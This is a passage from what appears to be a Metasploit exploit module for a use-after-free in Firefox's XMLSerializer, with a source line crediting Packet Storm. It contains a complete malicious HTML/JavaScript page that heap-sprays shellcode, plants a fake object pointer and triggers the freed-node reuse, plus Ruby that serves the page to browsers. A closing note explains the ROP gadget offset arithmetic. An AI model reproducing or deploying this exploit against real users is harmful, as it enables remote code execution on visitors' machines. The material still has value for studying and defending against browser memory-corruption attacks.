    js_ptr    = Rex::Text.to_unescape([target['FakeObject']].pack("V"), Rex::Arch.endian(target.arch))

    content = <<-HTML
<html>
<script>
var heap_chunks;

function heapSpray(shellcode, fillsled) {
  var chunk_size, headersize, fillsled_len, code;
  var i, codewithnum;
  chunk_size = 0x40000;
  headersize = 0x10;
  fillsled_len = chunk_size - (headersize + shellcode.length);
  while (fillsled.length < fillsled_len)
    fillsled += fillsled;
  fillsled = fillsled.substring(0, fillsled_len);
  code = shellcode + fillsled;
  heap_chunks = new Array();
  for (i = 0; i < 1000; i++) {
    codewithnum = "HERE" + code;
    heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
  }
}

function gen(len, pad) {
  pad = unescape(pad);
  while (pad.length < len/2)
    pad += pad;
  return pad.substring(0, len/2-1);
}

function run() {
  var container = [];
  var myshellcode = unescape("#{js_code}");
  var myfillsled = unescape("#{js_random}");
  heapSpray(myshellcode, myfillsled);

  var fake = "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "#{js_ptr}";
  var small = gen(72, fake);

  var text = 'x';
  while (text.length <= 1024)
    text += text;

  var parent = document.createElement("parent");
  var child = document.createElement("child");
  parent.appendChild(child);
  child.setAttribute("foo", text);

  var s = new XMLSerializer();
  var stream = {
    write: function() {
      parent.removeChild(child);
      child = null;
      for (i = 0; i < 2097152; ++i)
        container.push(small.toLowerCase());
    }
  };
  s.serializeToStream(parent, stream, "UTF-8");
}
</script>
<body onload="run();">
</body>
</html>
    HTML

    print_status("URI #{request.uri} requested...")
    print_status("Sending HTML")
    send_response(cli, content, {'Content-Type'=>'text/html'})
  end
end

Source: Firefox XMLSerializer Use After Free - Packet Storm
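As a side note on the ROP layout in the module: control is gained via "call dword ptr [eax+2F8h]" with eax pointing at the fake vftable, and the padding is sized so that the pop/ret gadget sits exactly at that offset. The arithmetic can be sanity-checked with a few lines of plain Ruby (this is just a check of the constants above, not part of the module):

```ruby
# The buffer starts with 7 dwords (fake vftable pointer, four ret gadgets,
# pop/ret gadget, 0x88888888), then 183 padding ret-gadget entries; each
# entry is 4 bytes wide, so the next dword lands at byte offset 0x2F8.
leading_dwords = 7
padding_rets   = 183
offset = (leading_dwords + padding_rets) * 4

printf("call offset: 0x%X\n", offset) # matches the 2F8h in "call dword ptr [eax+2F8h]"
```

This is why the module multiplies the RetGadget by exactly 183: any other count would shift the pop/ret gadget away from the slot the hijacked virtual call reads.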